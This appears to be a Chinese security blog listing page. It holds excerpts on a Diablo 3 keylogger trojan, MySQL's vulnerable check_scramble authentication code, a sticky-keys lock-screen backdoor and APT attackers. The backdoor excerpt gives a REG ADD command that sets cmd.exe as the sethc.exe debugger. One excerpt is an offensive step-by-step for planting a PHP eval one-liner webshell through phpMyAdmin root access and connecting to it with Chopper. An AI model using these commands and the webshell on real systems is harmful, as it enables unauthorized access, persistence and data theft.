这是我反病毒工作生涯中头一回遇到这样的事,给我留下了深刻的印象。我在研究一种病毒时竟然和制作这个病毒的黑客进行了聊天。没错,聊天。事情发生在Threat反病毒小组研究有关《暗黑破坏神3》的键盘监控病毒时发生的。当时很多游戏玩家说在玩这款游戏时发生账户被盗事件。病毒的样本在台湾的一家网站上被发现。
这个黑客在论坛里张贴了一篇叫做“How to farm Izual in Inferno”的文章(Izual是暗黑破坏神3中的一个boss),里面提供了一个链接,文章说链接指向的视频演示了操作步骤。
下面就是所谓的“视频”。它是一个RAR压缩文件,里面包含两个可执行文件。这两个文件除了图标和名称外,内容一模一样。
这个病毒软件会以TCP方式通过80端口连接上远程服务器,下载一个新的文件。
病毒软件里这种下载/开后门行为非常常见,我们关心的只是涉及到《暗黑破坏神3》的键盘监控部分,所以就没太注意它。
但是,让人吃惊的一幕就在此时上演了。一个对话框突然弹了出来,里面有下面的信息: 继续阅读
这个BUG实际上早在4月份就被发现了,今年5月7号,MySQL发布5.5.24的时候,修正了这个BUG。
漏洞分析:
出问题的代码如下
my_bool check_scramble(const uchar *scramble_arg, const char *message,
const uint8 *hash_stage2)
{
SHA1_CONTEXT sha1_context;
uint8 buf[SHA1_HASH_SIZE];
uint8 hash_stage2_reassured[SHA1_HASH_SIZE];
mysql_sha1_reset(&sha1_context);
/* create key to encrypt scramble */ mysql_sha1_input(&sha1_context, (const uint8 *) message, SCRAMBLE_LENGTH);
mysql_sha1_input(&sha1_context, hash_stage2, SHA1_HASH_SIZE);
mysql_sha1_result(&sha1_context, buf);
/* encrypt scramble */ my_crypt((char *) buf, buf, scramble_arg, SCRAMBLE_LENGTH);
/* now buf supposedly contains hash_stage1: so we can get hash_stage2 */ mysql_sha1_reset(&sha1_context);
mysql_sha1_input(&sha1_context, buf, SHA1_HASH_SIZE);
mysql_sha1_result(&sha1_context, hash_stage2_reassured);
return memcmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE);
}
你看完这篇文章你还会觉得你离开电脑之后win7锁定屏幕安全的话..那就是人才了!
Windows系统的粘滞键功能很多人应该有所耳闻,它是一种辅助功能,帮助一些不方便同时按下两个(或更多)键的人也能实现组合键操作。在默认情况下,连续敲击五次“Shift”键便会自动启用“粘滞键”功能。但是,这个粘滞键功能会产生一些副作用,有国外网站报道称,利用粘滞键可以在Windows 7锁定屏幕的情况下运行程序。
要实现这个目的很容易,只需添加一条注册表项就可以,输入以下代码;
REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”
即使在锁定屏幕,只要连按五次Shift就可以启动命令行窗口,然后通过它可以运行各种你想运行的程序。很显然,这个漏洞会对用户的数据安全造成隐患,即使无法登陆系统,如果之前通过某些途径添加了上述注册表项,那么锁定计算机将成为一个笑话。
因此,建议用户关闭粘滞键功能,方法是取消“控制面板–轻松访问–轻松访问中心–使键盘更易于使用”下的“启用粘滞键”选项。
目前,这个漏洞尚未得到修正,它影响Windows 7,Windows Server 2008 R2,以及Windows 8消费预览版。
本文来自:梧桐雨软件园转自网络,转载请注明出处。
把今晚的思路整理一下。
拿到了phpmyadmin root权限以后。
create database wutongyu(这个为数据库名称).
use wutongyu(连接数据库)
create table shell(code text) (建立表shell,字段code为文本型数据)
insert into shell(code) values (‘<?php @eval($_POST[‘c’]);?>’); 插入一句话,密码为C
访问就会爆出绝对路径。
导出之后,一句话木马,用菜刀链接。
整个过程也算完成了,提权方式因环境而异。对提权目前我也不熟悉。这里不过多阐述。
概念:
APT是高持续威胁攻击的简称。
简单的描述:APT攻击除了利用黑客常用的技术攻击以外,还会利用一些其他手段对目标进行高持续时间的攻击,危害极大,防范方法目前较少。
一般而言,APT攻击主要针对的目标是政府机构与军事机构。
APT攻击者一般具备以下一些特点:
聪明。他们非常聪明,能写出复杂病毒,蠕虫和其他恶意程序,然后进行伪装,这样很多防火墙,AV和IDS以及其他工具就不会找到他们,即便是他们正从你的网络中偷取信息。在有些案例中,特别是涉及银行的案例中,黑客必须指导人们进行操作,从ATM机处取钱,然后将其转存到其他银行账号。和素质较好的CSO们一样,这些黑客必须了解整个IT环境,而不仅仅是目标网络。
行事有条不紊。他们会购买和运行所有有意义的反病毒工具,然后在攻击前用这些工具测试自己的代码,以确保自己不会很快就被发现。 继续阅读